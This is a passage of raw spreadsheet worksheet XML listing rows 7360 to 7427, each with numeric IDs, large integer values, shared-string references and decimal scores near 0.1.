      <c r="A7360" s="1">
        <v>31264.0</v>
      </c>
      <c r="B7360" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C7360" s="2" t="s">
        <v>6983</v>
      </c>
      <c r="D7360" s="2">
        <v>1.0</v>
      </c>
      <c r="E7360" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7360" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7361" ht="15.75" customHeight="1">
      <c r="A7361" s="1">
        <v>31543.0</v>
      </c>
      <c r="B7361" s="2">
        <v>5107919.0</v>
      </c>
      <c r="C7361" s="2" t="s">
        <v>6984</v>
      </c>
      <c r="D7361" s="2">
        <v>1.0</v>
      </c>
      <c r="E7361" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7361" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7362" ht="15.75" customHeight="1">
      <c r="A7362" s="1">
        <v>31567.0</v>
      </c>
      <c r="B7362" s="2">
        <v>5122559.0</v>
      </c>
      <c r="C7362" s="2" t="s">
        <v>6985</v>
      </c>
      <c r="D7362" s="2">
        <v>1.0</v>
      </c>
      <c r="E7362" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7362" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7363" ht="15.75" customHeight="1">
      <c r="A7363" s="1">
        <v>31607.0</v>
      </c>
      <c r="B7363" s="2">
        <v>5.1383133E7</v>
      </c>
      <c r="C7363" s="2" t="s">
        <v>6986</v>
      </c>
      <c r="D7363" s="2">
        <v>1.0</v>
      </c>
      <c r="E7363" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7363" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7364" ht="15.75" customHeight="1">
      <c r="A7364" s="1">
        <v>31725.0</v>
      </c>
      <c r="B7364" s="2">
        <v>5.2136693E7</v>
      </c>
      <c r="C7364" s="2" t="s">
        <v>6954</v>
      </c>
      <c r="D7364" s="2">
        <v>1.0</v>
      </c>
      <c r="E7364" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7364" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7365" ht="15.75" customHeight="1">
      <c r="A7365" s="1">
        <v>31776.0</v>
      </c>
      <c r="B7365" s="2">
        <v>5220514.0</v>
      </c>
      <c r="C7365" s="2" t="s">
        <v>6987</v>
      </c>
      <c r="D7365" s="2">
        <v>1.0</v>
      </c>
      <c r="E7365" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7365" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7366" ht="15.75" customHeight="1">
      <c r="A7366" s="1">
        <v>32059.0</v>
      </c>
      <c r="B7366" s="2">
        <v>5378720.0</v>
      </c>
      <c r="C7366" s="2" t="s">
        <v>6988</v>
      </c>
      <c r="D7366" s="2">
        <v>1.0</v>
      </c>
      <c r="E7366" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7366" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7367" ht="15.75" customHeight="1">
      <c r="A7367" s="1">
        <v>32240.0</v>
      </c>
      <c r="B7367" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C7367" s="2" t="s">
        <v>6989</v>
      </c>
      <c r="D7367" s="2">
        <v>1.0</v>
      </c>
      <c r="E7367" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7367" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7368" ht="15.75" customHeight="1">
      <c r="A7368" s="1">
        <v>32453.0</v>
      </c>
      <c r="B7368" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C7368" s="2" t="s">
        <v>6990</v>
      </c>
      <c r="D7368" s="2">
        <v>1.0</v>
      </c>
      <c r="E7368" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7368" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7369" ht="15.75" customHeight="1">
      <c r="A7369" s="1">
        <v>32691.0</v>
      </c>
      <c r="B7369" s="2">
        <v>5953420.0</v>
      </c>
      <c r="C7369" s="2" t="s">
        <v>6991</v>
      </c>
      <c r="D7369" s="2">
        <v>1.0</v>
      </c>
      <c r="E7369" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7369" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7370" ht="15.75" customHeight="1">
      <c r="A7370" s="1">
        <v>32849.0</v>
      </c>
      <c r="B7370" s="2">
        <v>6253471.0</v>
      </c>
      <c r="C7370" s="2" t="s">
        <v>6992</v>
      </c>
      <c r="D7370" s="2">
        <v>1.0</v>
      </c>
      <c r="E7370" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7370" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7371" ht="15.75" customHeight="1">
      <c r="A7371" s="1">
        <v>32949.0</v>
      </c>
      <c r="B7371" s="2">
        <v>6478823.0</v>
      </c>
      <c r="C7371" s="2" t="s">
        <v>6993</v>
      </c>
      <c r="D7371" s="2">
        <v>1.0</v>
      </c>
      <c r="E7371" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7371" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7372" ht="15.75" customHeight="1">
      <c r="A7372" s="1">
        <v>33026.0</v>
      </c>
      <c r="B7372" s="2">
        <v>6669464.0</v>
      </c>
      <c r="C7372" s="2" t="s">
        <v>6994</v>
      </c>
      <c r="D7372" s="2">
        <v>1.0</v>
      </c>
      <c r="E7372" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7372" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7373" ht="15.75" customHeight="1">
      <c r="A7373" s="1">
        <v>33090.0</v>
      </c>
      <c r="B7373" s="2">
        <v>6936556.0</v>
      </c>
      <c r="C7373" s="2" t="s">
        <v>6995</v>
      </c>
      <c r="D7373" s="2">
        <v>1.0</v>
      </c>
      <c r="E7373" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7373" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7374" ht="15.75" customHeight="1">
      <c r="A7374" s="1">
        <v>33503.0</v>
      </c>
      <c r="B7374" s="2">
        <v>8061200.0</v>
      </c>
      <c r="C7374" s="2" t="s">
        <v>6996</v>
      </c>
      <c r="D7374" s="2">
        <v>1.0</v>
      </c>
      <c r="E7374" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7374" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7375" ht="15.75" customHeight="1">
      <c r="A7375" s="1">
        <v>33808.0</v>
      </c>
      <c r="B7375" s="2">
        <v>8843797.0</v>
      </c>
      <c r="C7375" s="2" t="s">
        <v>6997</v>
      </c>
      <c r="D7375" s="2">
        <v>1.0</v>
      </c>
      <c r="E7375" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7375" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7376" ht="15.75" customHeight="1">
      <c r="A7376" s="1">
        <v>34109.0</v>
      </c>
      <c r="B7376" s="2">
        <v>9721651.0</v>
      </c>
      <c r="C7376" s="2" t="s">
        <v>6998</v>
      </c>
      <c r="D7376" s="2">
        <v>1.0</v>
      </c>
      <c r="E7376" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7376" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7377" ht="15.75" customHeight="1">
      <c r="A7377" s="1">
        <v>34133.0</v>
      </c>
      <c r="B7377" s="2">
        <v>9779015.0</v>
      </c>
      <c r="C7377" s="2" t="s">
        <v>6999</v>
      </c>
      <c r="D7377" s="2">
        <v>1.0</v>
      </c>
      <c r="E7377" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7377" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7378" ht="15.75" customHeight="1">
      <c r="A7378" s="1">
        <v>6206.0</v>
      </c>
      <c r="B7378" s="2">
        <v>4.7978513E7</v>
      </c>
      <c r="C7378" s="2" t="s">
        <v>7000</v>
      </c>
      <c r="D7378" s="2">
        <v>1.0</v>
      </c>
      <c r="E7378" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7378" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="7379" ht="15.75" customHeight="1">
      <c r="A7379" s="1">
        <v>19483.0</v>
      </c>
      <c r="B7379" s="2">
        <v>5.5857934E7</v>
      </c>
      <c r="C7379" s="2" t="s">
        <v>7001</v>
      </c>
      <c r="D7379" s="2">
        <v>1.0</v>
      </c>
      <c r="E7379" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7379" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="7380" ht="15.75" customHeight="1">
      <c r="A7380" s="1">
        <v>23369.0</v>
      </c>
      <c r="B7380" s="2">
        <v>5.522177E7</v>
      </c>
      <c r="C7380" s="2" t="s">
        <v>7002</v>
      </c>
      <c r="D7380" s="2">
        <v>1.0</v>
      </c>
      <c r="E7380" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7380" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="7381" ht="15.75" customHeight="1">
      <c r="A7381" s="1">
        <v>31797.0</v>
      </c>
      <c r="B7381" s="2">
        <v>5237006.0</v>
      </c>
      <c r="C7381" s="2" t="s">
        <v>7003</v>
      </c>
      <c r="D7381" s="2">
        <v>1.0</v>
      </c>
      <c r="E7381" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7381" s="2">
        <v>0.1007532956685499</v>
      </c>
    </row>
    <row r="7382" ht="15.75" customHeight="1">
      <c r="A7382" s="1">
        <v>23405.0</v>
      </c>
      <c r="B7382" s="2">
        <v>5591904.0</v>
      </c>
      <c r="C7382" s="2" t="s">
        <v>7004</v>
      </c>
      <c r="D7382" s="2">
        <v>1.0</v>
      </c>
      <c r="E7382" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7382" s="2">
        <v>0.1005747126436781</v>
      </c>
    </row>
    <row r="7383" ht="15.75" customHeight="1">
      <c r="A7383" s="1">
        <v>8784.0</v>
      </c>
      <c r="B7383" s="2">
        <v>5.4591414E7</v>
      </c>
      <c r="C7383" s="2" t="s">
        <v>7005</v>
      </c>
      <c r="D7383" s="2">
        <v>1.0</v>
      </c>
      <c r="E7383" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7383" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="7384" ht="15.75" customHeight="1">
      <c r="A7384" s="1">
        <v>8875.0</v>
      </c>
      <c r="B7384" s="2">
        <v>5.4754094E7</v>
      </c>
      <c r="C7384" s="2" t="s">
        <v>7006</v>
      </c>
      <c r="D7384" s="2">
        <v>1.0</v>
      </c>
      <c r="E7384" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7384" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="7385" ht="15.75" customHeight="1">
      <c r="A7385" s="1">
        <v>25956.0</v>
      </c>
      <c r="B7385" s="2">
        <v>1.5266842E7</v>
      </c>
      <c r="C7385" s="2" t="s">
        <v>7007</v>
      </c>
      <c r="D7385" s="2">
        <v>1.0</v>
      </c>
      <c r="E7385" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7385" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="7386" ht="15.75" customHeight="1">
      <c r="A7386" s="1">
        <v>14932.0</v>
      </c>
      <c r="B7386" s="2">
        <v>4.1229329E7</v>
      </c>
      <c r="C7386" s="2" t="s">
        <v>7008</v>
      </c>
      <c r="D7386" s="2">
        <v>1.0</v>
      </c>
      <c r="E7386" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7386" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="7387" ht="15.75" customHeight="1">
      <c r="A7387" s="1">
        <v>23642.0</v>
      </c>
      <c r="B7387" s="2">
        <v>6693569.0</v>
      </c>
      <c r="C7387" s="2" t="s">
        <v>7009</v>
      </c>
      <c r="D7387" s="2">
        <v>1.0</v>
      </c>
      <c r="E7387" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7387" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="7388" ht="15.75" customHeight="1">
      <c r="A7388" s="1">
        <v>21519.0</v>
      </c>
      <c r="B7388" s="2">
        <v>2.3236624E7</v>
      </c>
      <c r="C7388" s="2" t="s">
        <v>7010</v>
      </c>
      <c r="D7388" s="2">
        <v>1.0</v>
      </c>
      <c r="E7388" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7388" s="2">
        <v>0.1</v>
      </c>
    </row>
    <row r="7389" ht="15.75" customHeight="1">
      <c r="A7389" s="1">
        <v>29717.0</v>
      </c>
      <c r="B7389" s="2">
        <v>3.4434643E7</v>
      </c>
      <c r="C7389" s="2" t="s">
        <v>7011</v>
      </c>
      <c r="D7389" s="2">
        <v>1.0</v>
      </c>
      <c r="E7389" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7389" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="7390" ht="15.75" customHeight="1">
      <c r="A7390" s="1">
        <v>28798.0</v>
      </c>
      <c r="B7390" s="2">
        <v>2.8613838E7</v>
      </c>
      <c r="C7390" s="2" t="s">
        <v>7012</v>
      </c>
      <c r="D7390" s="2">
        <v>1.0</v>
      </c>
      <c r="E7390" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7390" s="2">
        <v>0.09982638888888888</v>
      </c>
    </row>
    <row r="7391" ht="15.75" customHeight="1">
      <c r="A7391" s="1">
        <v>25006.0</v>
      </c>
      <c r="B7391" s="2">
        <v>1.2721521E7</v>
      </c>
      <c r="C7391" s="2" t="s">
        <v>7013</v>
      </c>
      <c r="D7391" s="2">
        <v>1.0</v>
      </c>
      <c r="E7391" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7391" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="7392" ht="15.75" customHeight="1">
      <c r="A7392" s="1">
        <v>23434.0</v>
      </c>
      <c r="B7392" s="2">
        <v>5.6549813E7</v>
      </c>
      <c r="C7392" s="2" t="s">
        <v>7014</v>
      </c>
      <c r="D7392" s="2">
        <v>1.0</v>
      </c>
      <c r="E7392" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7392" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="7393" ht="15.75" customHeight="1">
      <c r="A7393" s="1">
        <v>23885.0</v>
      </c>
      <c r="B7393" s="2">
        <v>8402614.0</v>
      </c>
      <c r="C7393" s="2" t="s">
        <v>7015</v>
      </c>
      <c r="D7393" s="2">
        <v>1.0</v>
      </c>
      <c r="E7393" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7393" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="7394" ht="15.75" customHeight="1">
      <c r="A7394" s="1">
        <v>32408.0</v>
      </c>
      <c r="B7394" s="2">
        <v>5636647.0</v>
      </c>
      <c r="C7394" s="2" t="s">
        <v>7016</v>
      </c>
      <c r="D7394" s="2">
        <v>1.0</v>
      </c>
      <c r="E7394" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7394" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="7395" ht="15.75" customHeight="1">
      <c r="A7395" s="1">
        <v>32495.0</v>
      </c>
      <c r="B7395" s="2">
        <v>5705334.0</v>
      </c>
      <c r="C7395" s="2" t="s">
        <v>7017</v>
      </c>
      <c r="D7395" s="2">
        <v>1.0</v>
      </c>
      <c r="E7395" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7395" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="7396" ht="15.75" customHeight="1">
      <c r="A7396" s="1">
        <v>34125.0</v>
      </c>
      <c r="B7396" s="2">
        <v>9768682.0</v>
      </c>
      <c r="C7396" s="2" t="s">
        <v>7018</v>
      </c>
      <c r="D7396" s="2">
        <v>1.0</v>
      </c>
      <c r="E7396" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7396" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="7397" ht="15.75" customHeight="1">
      <c r="A7397" s="1">
        <v>17312.0</v>
      </c>
      <c r="B7397" s="2">
        <v>4.9317704E7</v>
      </c>
      <c r="C7397" s="2" t="s">
        <v>7019</v>
      </c>
      <c r="D7397" s="2">
        <v>1.0</v>
      </c>
      <c r="E7397" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7397" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="7398" ht="15.75" customHeight="1">
      <c r="A7398" s="1">
        <v>33770.0</v>
      </c>
      <c r="B7398" s="2">
        <v>8670567.0</v>
      </c>
      <c r="C7398" s="2" t="s">
        <v>7020</v>
      </c>
      <c r="D7398" s="2">
        <v>1.0</v>
      </c>
      <c r="E7398" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7398" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="7399" ht="15.75" customHeight="1">
      <c r="A7399" s="1">
        <v>26997.0</v>
      </c>
      <c r="B7399" s="2">
        <v>1.9844245E7</v>
      </c>
      <c r="C7399" s="2" t="s">
        <v>7021</v>
      </c>
      <c r="D7399" s="2">
        <v>1.0</v>
      </c>
      <c r="E7399" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7399" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="7400" ht="15.75" customHeight="1">
      <c r="A7400" s="1">
        <v>28341.0</v>
      </c>
      <c r="B7400" s="2">
        <v>2.5890254E7</v>
      </c>
      <c r="C7400" s="2" t="s">
        <v>7022</v>
      </c>
      <c r="D7400" s="2">
        <v>1.0</v>
      </c>
      <c r="E7400" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7400" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="7401" ht="15.75" customHeight="1">
      <c r="A7401" s="1">
        <v>18701.0</v>
      </c>
      <c r="B7401" s="2">
        <v>5.3626525E7</v>
      </c>
      <c r="C7401" s="2" t="s">
        <v>7023</v>
      </c>
      <c r="D7401" s="2">
        <v>1.0</v>
      </c>
      <c r="E7401" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7401" s="2">
        <v>0.09946236559139786</v>
      </c>
    </row>
    <row r="7402" ht="15.75" customHeight="1">
      <c r="A7402" s="1">
        <v>24787.0</v>
      </c>
      <c r="B7402" s="2">
        <v>1.1962446E7</v>
      </c>
      <c r="C7402" s="2" t="s">
        <v>7024</v>
      </c>
      <c r="D7402" s="2">
        <v>1.0</v>
      </c>
      <c r="E7402" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7402" s="2">
        <v>0.09946236559139786</v>
      </c>
    </row>
    <row r="7403" ht="15.75" customHeight="1">
      <c r="A7403" s="1">
        <v>7787.0</v>
      </c>
      <c r="B7403" s="2">
        <v>5.2198229E7</v>
      </c>
      <c r="C7403" s="2" t="s">
        <v>7025</v>
      </c>
      <c r="D7403" s="2">
        <v>1.0</v>
      </c>
      <c r="E7403" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7403" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="7404" ht="15.75" customHeight="1">
      <c r="A7404" s="1">
        <v>11191.0</v>
      </c>
      <c r="B7404" s="2">
        <v>1.9831952E7</v>
      </c>
      <c r="C7404" s="2" t="s">
        <v>7026</v>
      </c>
      <c r="D7404" s="2">
        <v>1.0</v>
      </c>
      <c r="E7404" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7404" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="7405" ht="15.75" customHeight="1">
      <c r="A7405" s="1">
        <v>24211.0</v>
      </c>
      <c r="B7405" s="2">
        <v>1.0387734E7</v>
      </c>
      <c r="C7405" s="2" t="s">
        <v>7027</v>
      </c>
      <c r="D7405" s="2">
        <v>1.0</v>
      </c>
      <c r="E7405" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7405" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="7406" ht="15.75" customHeight="1">
      <c r="A7406" s="1">
        <v>142.0</v>
      </c>
      <c r="B7406" s="2">
        <v>1.3583222E7</v>
      </c>
      <c r="C7406" s="2" t="s">
        <v>7028</v>
      </c>
      <c r="D7406" s="2">
        <v>1.0</v>
      </c>
      <c r="E7406" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7406" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7407" ht="15.75" customHeight="1">
      <c r="A7407" s="1">
        <v>744.0</v>
      </c>
      <c r="B7407" s="2">
        <v>2.0884289E7</v>
      </c>
      <c r="C7407" s="2" t="s">
        <v>7029</v>
      </c>
      <c r="D7407" s="2">
        <v>1.0</v>
      </c>
      <c r="E7407" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7407" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7408" ht="15.75" customHeight="1">
      <c r="A7408" s="1">
        <v>1275.0</v>
      </c>
      <c r="B7408" s="2">
        <v>2.5438295E7</v>
      </c>
      <c r="C7408" s="2" t="s">
        <v>7030</v>
      </c>
      <c r="D7408" s="2">
        <v>1.0</v>
      </c>
      <c r="E7408" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7408" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7409" ht="15.75" customHeight="1">
      <c r="A7409" s="1">
        <v>1771.0</v>
      </c>
      <c r="B7409" s="2">
        <v>2.9028157E7</v>
      </c>
      <c r="C7409" s="2" t="s">
        <v>7031</v>
      </c>
      <c r="D7409" s="2">
        <v>1.0</v>
      </c>
      <c r="E7409" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7409" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7410" ht="15.75" customHeight="1">
      <c r="A7410" s="1">
        <v>2088.0</v>
      </c>
      <c r="B7410" s="2">
        <v>3.1239215E7</v>
      </c>
      <c r="C7410" s="2" t="s">
        <v>7032</v>
      </c>
      <c r="D7410" s="2">
        <v>1.0</v>
      </c>
      <c r="E7410" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7410" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7411" ht="15.75" customHeight="1">
      <c r="A7411" s="1">
        <v>2180.0</v>
      </c>
      <c r="B7411" s="2">
        <v>3.1827645E7</v>
      </c>
      <c r="C7411" s="2" t="s">
        <v>7033</v>
      </c>
      <c r="D7411" s="2">
        <v>1.0</v>
      </c>
      <c r="E7411" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7411" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7412" ht="15.75" customHeight="1">
      <c r="A7412" s="1">
        <v>2276.0</v>
      </c>
      <c r="B7412" s="2">
        <v>3.2527615E7</v>
      </c>
      <c r="C7412" s="2" t="s">
        <v>7034</v>
      </c>
      <c r="D7412" s="2">
        <v>1.0</v>
      </c>
      <c r="E7412" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7412" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7413" ht="15.75" customHeight="1">
      <c r="A7413" s="1">
        <v>2532.0</v>
      </c>
      <c r="B7413" s="2">
        <v>3.4097042E7</v>
      </c>
      <c r="C7413" s="2" t="s">
        <v>7035</v>
      </c>
      <c r="D7413" s="2">
        <v>1.0</v>
      </c>
      <c r="E7413" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7413" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7414" ht="15.75" customHeight="1">
      <c r="A7414" s="1">
        <v>3055.0</v>
      </c>
      <c r="B7414" s="2">
        <v>3.6506302E7</v>
      </c>
      <c r="C7414" s="2" t="s">
        <v>7036</v>
      </c>
      <c r="D7414" s="2">
        <v>1.0</v>
      </c>
      <c r="E7414" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7414" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7415" ht="15.75" customHeight="1">
      <c r="A7415" s="1">
        <v>4370.0</v>
      </c>
      <c r="B7415" s="2">
        <v>4.2132051E7</v>
      </c>
      <c r="C7415" s="2" t="s">
        <v>7037</v>
      </c>
      <c r="D7415" s="2">
        <v>1.0</v>
      </c>
      <c r="E7415" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7415" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7416" ht="15.75" customHeight="1">
      <c r="A7416" s="1">
        <v>4708.0</v>
      </c>
      <c r="B7416" s="2">
        <v>4.3256365E7</v>
      </c>
      <c r="C7416" s="2" t="s">
        <v>7038</v>
      </c>
      <c r="D7416" s="2">
        <v>1.0</v>
      </c>
      <c r="E7416" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7416" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7417" ht="15.75" customHeight="1">
      <c r="A7417" s="1">
        <v>5016.0</v>
      </c>
      <c r="B7417" s="2">
        <v>4.4200367E7</v>
      </c>
      <c r="C7417" s="2" t="s">
        <v>7039</v>
      </c>
      <c r="D7417" s="2">
        <v>1.0</v>
      </c>
      <c r="E7417" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7417" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7418" ht="15.75" customHeight="1">
      <c r="A7418" s="1">
        <v>5289.0</v>
      </c>
      <c r="B7418" s="2">
        <v>4.5201967E7</v>
      </c>
      <c r="C7418" s="2" t="s">
        <v>7040</v>
      </c>
      <c r="D7418" s="2">
        <v>1.0</v>
      </c>
      <c r="E7418" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7418" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7419" ht="15.75" customHeight="1">
      <c r="A7419" s="1">
        <v>6635.0</v>
      </c>
      <c r="B7419" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C7419" s="2" t="s">
        <v>7041</v>
      </c>
      <c r="D7419" s="2">
        <v>1.0</v>
      </c>
      <c r="E7419" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7419" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7420" ht="15.75" customHeight="1">
      <c r="A7420" s="1">
        <v>6852.0</v>
      </c>
      <c r="B7420" s="2">
        <v>4.9646347E7</v>
      </c>
      <c r="C7420" s="2" t="s">
        <v>7042</v>
      </c>
      <c r="D7420" s="2">
        <v>1.0</v>
      </c>
      <c r="E7420" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7420" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7421" ht="15.75" customHeight="1">
      <c r="A7421" s="1">
        <v>7114.0</v>
      </c>
      <c r="B7421" s="2">
        <v>5.0367837E7</v>
      </c>
      <c r="C7421" s="2" t="s">
        <v>7043</v>
      </c>
      <c r="D7421" s="2">
        <v>1.0</v>
      </c>
      <c r="E7421" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7421" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7422" ht="15.75" customHeight="1">
      <c r="A7422" s="1">
        <v>7752.0</v>
      </c>
      <c r="B7422" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C7422" s="2" t="s">
        <v>7044</v>
      </c>
      <c r="D7422" s="2">
        <v>1.0</v>
      </c>
      <c r="E7422" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7422" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7423" ht="15.75" customHeight="1">
      <c r="A7423" s="1">
        <v>8093.0</v>
      </c>
      <c r="B7423" s="2">
        <v>5.3049085E7</v>
      </c>
      <c r="C7423" s="2" t="s">
        <v>7045</v>
      </c>
      <c r="D7423" s="2">
        <v>1.0</v>
      </c>
      <c r="E7423" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7423" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7424" ht="15.75" customHeight="1">
      <c r="A7424" s="1">
        <v>8326.0</v>
      </c>
      <c r="B7424" s="2">
        <v>5.3643821E7</v>
      </c>
      <c r="C7424" s="2" t="s">
        <v>7046</v>
      </c>
      <c r="D7424" s="2">
        <v>1.0</v>
      </c>
      <c r="E7424" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7424" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7425" ht="15.75" customHeight="1">
      <c r="A7425" s="1">
        <v>8629.0</v>
      </c>
      <c r="B7425" s="2">
        <v>5.4314461E7</v>
      </c>
      <c r="C7425" s="2" t="s">
        <v>7047</v>
      </c>
      <c r="D7425" s="2">
        <v>1.0</v>
      </c>
      <c r="E7425" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7425" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7426" ht="15.75" customHeight="1">
      <c r="A7426" s="1">
        <v>8706.0</v>
      </c>
      <c r="B7426" s="2">
        <v>5.4450222E7</v>
      </c>
      <c r="C7426" s="2" t="s">
        <v>7048</v>
      </c>
      <c r="D7426" s="2">
        <v>1.0</v>
      </c>
      <c r="E7426" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7426" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7427" ht="15.75" customHeight="1">
      <c r="A7427" s="1">
        <v>8794.0</v>
      </c>
      <c r="B7427" s="2">
